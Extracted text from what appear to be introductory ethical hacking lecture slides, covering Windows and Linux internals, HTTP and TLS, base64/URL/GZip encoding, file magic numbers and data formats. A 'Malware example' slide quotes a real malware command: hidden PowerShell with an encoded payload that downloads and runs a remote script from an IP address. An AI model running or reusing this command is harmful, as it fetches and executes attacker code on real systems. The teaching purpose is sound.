Ethical Hacking
Ethical Hacking
Introduction – part 2
Course Info
OS
Windows / Linux
Process / Privilege Rings
Permissions / Owners
OSI Model
TCP/IP
Application
HTTP/S
Methods, Headers
TLS Handshake
Encoding
Base64, UTF, URL, GZip
Data format
Header, Magic Number
XML, JSON
DOCX
Metadata
EXIF, Email Header, HTTP Header
iNode, MFT
Desktops
Servers
Windows
Key Terms
NT version (10.0)
RTM Build number (14393)
Architecture (x64 = x86_64)
C:\Users\user>systeminfo
Host Name: DESKTOP-Win10
OS Name: Microsoft Windows 10
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
Original Install Date: 12/28/2020, 2:30:36 AM
System Boot Time: 1/4/2021, 11:42:23 PM
System Model: VirtualBox
System Type: x64-based PC
The system info was stored in Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Windows
OS Build Date PDB Profile
10 x64 10.0.10586.306 2016-04-23 1AC738FB Win10x64_10586
10 x64 10.0.14393.0 2016-07-16 DD08DD42 Win10x64_14393 (Anniversary)
10 x64 10.0.15063.0 2017-04-04 Win10x64_15063 (Creators)
10 x86 10.0.10586.420 2016-05-28 44B89EEA Win10x86_10586
10 x86 10.0.14393.0 2016-07-16 9619274A Win10x86_14393 (Anniversary)
10 x86 10.0.15063.0 2017-04-04 Win10x86_15063 (Creators)
2008 R2 SP1 x64 6.1.7601.23418 2016-04-09 632B36E0 Win2008R2SP1x64_23418
2008 R2 x64 6.3.9600.18340 2016-05-13 54B5A1C6 Win2012R2x64_18340
7 SP1 x64 6.1.7601.23418 2016-04-09 632B36E0 Win7SP1x64_23418
7 SP1 x86 6.1.7601.23418 2016-04-09 BBA98F40 Win7SP1x86_23418
7 SP1 x64 6.1.7601.24000 2018-01-09 Win7SP1x64_24000
7 SP1 x86 6.1.7601.24000 2018-01-09 Win7SP1x86_24000
8 x64 6.3.9600.18340 2016-05-13 54B5A1C6 Win8SP1x64_18340
List of Volatility Memory Profiles for Windows
Linux
Current Linux kernels
Linux 5.10 is the current version (LTS)
Linux 4.19 LTS support till 2024
Two Supporting Mode
LTS – Long term Support, mainly for stable releases and flagship products
Windows 10 – 10 years
Ubuntu – 5 Years
Linux – 6 Years+
Mac – 3 years
Debian – 2 Years / RHEL – 5.5 + 3.5 years
STS – Short term support, feature release
Linux Distribution Timeline
Linux Distribution Timeline
Linux Kernel map
Process
UID PID PPID C STIME TTY TIME CMD
501 2701 2695 0 4:00PM ttys000 0:00.10 -zsh
501 3595 2701 0 6:41PM ttys000 0:13.68 curl https://az792536.vo.msecnd.net/vms/VMBuild_20190311/VMware/MSEdge/MSEdge.Win10.VMware.zip -o MSEdge.Win10.VMWare.zip
One of the key elements in OS
Attributes:
PID: process ID
PPID: parent process ID
Owner/User
Binary path
Process name
Command
Start time
SANS Find Evil Process
Privilege Rings
Defined with data security model
Inner ring got higher privilege
Confidentiality (red) Data Integrity (write)
Most OS uses only two
Ring 0 – Kernel mode
Ring 3 – User mode (admin + user)
Some applications implements with sandboxing
IE process can only write to LocalLow in protected mode
WriteFile()
User space:
Called WriteFile() from Kernel32.dll
Calls NTWriteFile() from ntdll.dll
SYSCALL from user to kernel
Kernel space:
Called NtWriteFile() from Ntoskrnl.exe
Called I/O Manager
Called Kernel-Mode Driver to support I/O Manger
Called HAL from Hal.dll to access ‘virtual hardware devices’
Actual data written to Hardware
Return in the reverse direction back to user Application
LSASS
One of the core process
Stores user credentials
Responsible for authentication
Enforce local policy (password complexity / expiring)
AD integration
Logs to Event log
Permissions
Defined in 4 types
D – file type
U – File Owner
G – Other group member as owner
O – Others
Permission for each type
R = 4, W=2, X=1
Typical Permission example
777 = global wrx, typically malware
640 = regular non-executable file, shared in group
400 = typically private keys
644 – default permission for Ubuntu (Umask 022)
% ssh -i mykey.key root@localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for ‘mykey.key’ are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key “mykey.key”: bad permissions
# To allow the same kube context to work on the host and the container:
E45: ‘readonly’ option is set (add ! to override)
OSI Models – 7 Layers
HTTP
F12
HTTP Request
HTTP POST
TLS Handshake
Versions
SSL 1.0, 2.0, 3.0 ( no longer in use)
TLS 1.0, 1.1, 1.2, 1.3
TLS 1.2 is the mainstream version
Authentication
Typically ONE WAY
Client verifies server only
Validates certificates
Negotiate CipherSuits
Exchange Sessions Keys
Encoding – Movie
The Art of Code – Dylan Beattie
DNA: The Code of Life (SHA2017)
https://www.youtube.com./watch?v=EcGM_cNzQmE
Encoding – base64
Address the issue of 8-bit clean bytes
Especially lower part of ASCII table
0x00,
Project ASCII space to subset of ASCII space
2^8 = 256 -> 2^6 = 64
Base64 char space:
A-Z (26)
a-z (26)
0-9 (10)
+/ (2)
Total length always in group of 4
Uses = or == for padding
Encoding – base64
Encoding – base64
Inline image
Taken from wikpedia
Encoding – base64
Email example
Attachment encoded in base64
MIME header includes metadata about the base64 payload
Content-type
Size
Encoding
Last modified date
–_004_HK is the content boundary (trunking)
Encoding – base64
Malware example
https://app.any.run/tasks/e9d31e2a-3858-44c7-a921-92499d624178/
“C:\Windows\System32\cmd.exe” /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMwA0AC4AMgAxADcALgAxADMAOQAvAHYAZQByAGMAaABlAGMAawAuAHAAcwAxACcAKQApAAoA
Encoding -UTF
ASCII space ( 1 byte or 256) is not sufficient to fit all languages
UTF-8 is capable of encoding all 1,112,064 valid character code points in Unicode using one to four one-byte (8-bit) code units
As of January 2021, UTF-8 accounts for on average 96.1% of all web pages and 96.3% of the top 1,000 highest ranked web pages.
Encoding – URL
URL must be able to fit the ASCII address space, so it must be normalized
Only printable characters are allows
Further reading
Uniform Resource Identifier (URI) RFC2396
Regular expression (Regex)
Opens attack windows for web attacks
Escaped encoding (e.g. %00)
Unicode-Encoding / double-encoding
A dot (.) can be written in 6 ways
2E (00101110)
C0 AE (11000000 10101110)
E0 80 AE (11100000 10000000 10101110)
F0 80 80 AE (11110000 10000000 10000000 10101110)
F8 80 80 80 AE (11111000 10000000 10000000 10000000 10101110)
FC 80 80 80 80 AE (11111100 10000000 10000000 10000000 10000000 10101110)
Encoding – URL
Encoding – GZIP
GZip is common for HTTP
Achieved high compression rate for text based contents
Was adopted as legacy when first generation internet is slow
Encoding in base64 is not always necessary for HTTP
Can be utilized to transform data in payload
Encoding – GZip
Wireshark:
Frame – the current (last) packet size
Reassembled TCP – the HTTP response was from 3 TCP payloads
Content-Length : 2476, total size of payload after Gzip compression
Uncompressed entity body: uncompressed payload (HTML)
You lost visibilities when traffic is in HTTPS
Use burpsuit proxy to decrypt
Use F12 browser debug mode
Magic Number
GUI Desktop – File extension driven
File Extension to instruct applications to handle a certain file (GUI desktop)
Windows – Registry (HKEY_CLASSES_ROOT / HKEY_CURRENT_USER\Software\Classes )
Mac – Plist (~/Library/Preferences/com.apple.LaunchServices.plist)
Linux – Distro and GUI desktop varies (Gnome, KDE)
Command line environment – execution program driven
typically binaries / scripts follows with optional parameters
Filenames are fetched via parameter / config file
Magic Number
Typically at the very beginning of file
Equitant to protocol-id in OSI to signal the upper layer data structure
Help application to identify version of target file payload
Header / Magic Number
$ file vlc-3.0.8.dmg
vlc-3.0.8.dmg: bzip2 compressed data, block size = 100k
$ hexdump -C vlc-3.0.8.dmg | head -n 5
00000000 42 5a 68 31 31 41 59 26 53 59 6a 29 d3 1a 00 00 |BZh11AY&SYj)….|
$ hexdump -C EH-20.pptx | more
00000000 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 d2 aa |PK……….!…|
$ file EH-20.pptx
EH-20.pptx: Microsoft PowerPoint 2007+
XML
Extensible Markup Language (XML)
markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable
XPath (XML Path Language)
To Query XML objects
XML / HTML
XML
Defines standard / schema at the beginning of XML file
HTML
Defines language sets, schema at the beginning
Can also be defined at
JSON
{
“firstName”: “Jonathan”,
“lastName”: “Freeman”,
“loginCount”: 4,
“isWriter”: true,
“worksWith”: [“AA Group”,“InfoWorld”],
“pets”: [
{
“name”: “Lilly”,
“type”: “Raccoon”
}
]
}
JavaScript Object Notation
JSON grew out of a need for stateless, real-time server-to-browser communication protocol without using browser plugins such as Flash or Java applets, the dominant methods used in the early 2000s
Normally referred as “unstructured data”
Elements are available as:
Number
String
Boolean
Array
Object
null
YAML
YAML = “YAML Ain’t Markup Language”
(remember GNU = GNU’s Not Unix!)
Use indentation and – for Layers
Support comments
Supported Objects similar to JSON
Structured Data vs Unstructured Data
You may convert formats among them
XML, JSON, YAML
May convert to CSV (less practical)
These are syntax defined data structure
Support dynamic data without schema
It’s fits well for small among of data or large data with complex data typesets
Often referred as NoSQL
Content of Office file (XML based)
You don’t need Microsoft office to extract elements of documents
Macro
Media
Old document files are in binary
Content of office 2007 or earlier file
Extract with OLEdump from an excel file [ reverse engineering ]
With extension .bin, (composite Document File)
Macro was with name vbaProject.bin
/docProps/thumbnail.jpeg